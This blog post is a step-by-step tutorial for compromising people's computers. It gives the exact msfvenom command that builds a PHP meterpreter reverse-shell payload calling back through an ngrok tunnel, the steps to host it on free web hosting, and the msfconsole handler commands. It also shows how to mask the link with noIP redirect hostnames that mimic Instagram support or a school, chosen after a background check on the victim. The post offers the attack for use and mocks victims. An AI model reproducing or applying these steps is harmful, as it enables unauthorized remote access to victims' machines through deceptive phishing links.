Greetings to visitors,
The purpose of this blog is to let everyone know how easy it is to hack your servers or any computer systems which is on INTERNET by just clicking on a link.
It was back in my school days when i performed an attack which was Distributed Denial of Service and i failed miserably 😥. So after learning the services and rules of Firewall i resorted to very simple but very effective technique and guess what It worked right in first attempt.
I generated a PHP payload with help of msfvenom [msfvenom is a standalone payload generator], got it on WAN with help of NGROK and prepared a backdoor 😁 So after every tools were right on the table, I played the game 😈
LETS START:
1.] The first step is to get your NGROK in to play. We use NGROK to open a secure TCP tunnel for all the incoming traffics on our port.
(So basically as we get Dynamic IP addresses by our ISP so we need to have an IP which should be static. Following methods are used for such cases)
1. Do IP address tunneling by NGROK.
2. Do Port-Forwarding in your router and get a Dynamic DNS by noIP.com.
3. Buy a Static IP.
I can’t go with No.2 or No.3 because my router is cunt and my wallets empty as my head.
COMMAND FOR NGROK TUNNELING: ./ngrok tcp 22

2.] So i am assuming you’ve done the tunneling and will proceed with creating the malicious .php file using msfvenom.
3.] On terminal type:
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19442 R> /root/Desktop/index.php
LHOST = You get from ngrok
LPORT = You get from ngrok
Once the above command is executed, Metasploit will generate the malicious index.php file on your Desktop.
Note: By the end of this Blog i have a surprise for you 😉

4.] Next step which i did was to get a Hosting. You can use ‘000webhostapp & infinityfree‘ for a free hosting. They don’t charge a penny for hosting and you can even use their free domain name. You can watch any YouTube video on “How to get a Free Web Hosting ? “.
I am going to use my existing hosting from ‘infinityfree.net‘ 🤕 and upload my ‘index.php’ file which i generated earlier.

5.] After you upload the file on your website, the php file can be accessed by ‘yourwebsitename.com/index.php’. My domain name is ‘QiritoVirusTest.epizy.com’ so my link would be ‘http://qiritovirustest.epizy.com/index.php‘.
6.] The next step would be masking of this fictitious link so that it should look legit or believable enough for our victim to click on and to do that we are going to use noIP.com.
1. Login into noIp.com.
2. Click on DynamicDNS -> Create Hostname -> ‘And Fill in the Details‘
3. Refer the picture below to see for the inputs.
What this does is it creates a new redirecting URL which you are suppose to send to our foolish victim So be sure what you want your link to be like.

7.] Now we are almost done so its time to setup our listener using msfconsole.
8.] Open Terminal and type ‘msfconsole‘ and the use following commands to get listener active;
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 22
exploit -j

9.] Our listener is active now its time to send the link to our victim.
This is where you get creative on how you can make the fool click on your link. What i usually do is run a background check on the guy, like if he’s from school i make URL as ‘important.”schoolname” ‘ or if its a guy who enjoys anime i get my URL as ‘top10anime‘ or if its a random guy who’s on Instagram you can have the link as ‘support.instagram‘. Think of one and use it on noIP as we did in Step 6. Just send the link to Victim
10.] When he clicks on our link, in my case its “http://instagramsupport.myftp.org” then he’ll get redirected to our main website which in my case is “http://qiritovirustest.epizy.com/index.php“
Our Victim will see a blank page and you’ll get a shell as soon as browser loads up the URL just like in the picture below:

Well you have shell, now you know what you’re capable of !
As a wise men said,”With great power comes great responsibility”
Pages: 1 2
Be First to Comment